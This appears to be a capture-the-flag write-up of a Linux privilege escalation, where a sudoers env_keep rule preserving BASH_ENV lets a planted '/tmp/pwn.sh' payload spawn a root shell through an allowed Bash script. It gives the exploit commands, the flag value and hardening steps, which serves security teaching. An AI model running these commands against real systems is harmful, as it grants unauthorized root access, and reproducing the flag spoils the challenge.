Executive Summary
This write-up demonstrates how a sudoers misconfiguration allows arbitrary code execution via BASH_ENV injection.
1. Reconnaissance & Enumeration
We started as ttyduser. Initial enumeration showed a clean environment, but checking sudo -l revealed a critical misconfiguration:
1Matching Defaults entries for ttyduser:
2 env_reset, ..., env_keep+="ENV BASH_ENV"
3
4User ttyduser may run:
5 (ALL) NOPASSWD: /usr/bin/securitycheck
2. Vulnerability Analysis
We identified a combination of two factors leading to RCE as Root:
env_keep+="ENV BASH_ENV": Sudo is configured to preserve theENVandBASH_ENVvariables.Target Script: Checking the target:
1head -n 1 /usr/bin/securitycheck 2# Output: #!/bin/bashSince the script uses the Bash shebang,
sudowill invokebashto execute it. When Bash starts non-interactively, it looks for theBASH_ENVvariable and sources the file it points to before executing the script.
3. Exploitation
We used a temporary payload script to inject our code.
The Professional Approach:
1# Create a simple payload
2echo "/bin/bash -p" > /tmp/pwn.sh
3chmod +x /tmp/pwn.sh # Professional practice: avoid 777
4
5# Trigger the exploit
6sudo BASH_ENV=/tmp/pwn.sh /usr/bin/securitycheck
Note: We used chmod +x to maintain clean permissions and ensure the payload is executable by the shell session.
4. Flag Retrieval
1# id
2# uid=0(root) gid=0(root)
3cat /root/flag.txt
Flag: Flag{QCFAd01HcGp0Ykk3ei9Mcm9rU2YzcXlYbm9Yc1lWYTdBb3RsWGppZlZOcFlVaz0wMWEwZTkzZmFmODJmNDE4}
5. Hardening & Mitigation
To properly secure this environment:
Remove
ENV BASH_ENVfromenv_keep: This is the primary vector.Enforce
env_reset: Ensure sudo strictly scrubs the environment unless explicitly whitelisted.Use
NOEXECTag: In/etc/sudoers, use theNOEXECtag to prevent the command from executing other programs.ttyduser ALL=(ALL) NOEXEC: /usr/bin/securitycheckSecure Scripting: Use
#!/bin/sh(which doesn’t respectBASH_ENVin many systems) or usebash -p(privileged mode) to ignore environment-defined initialization files.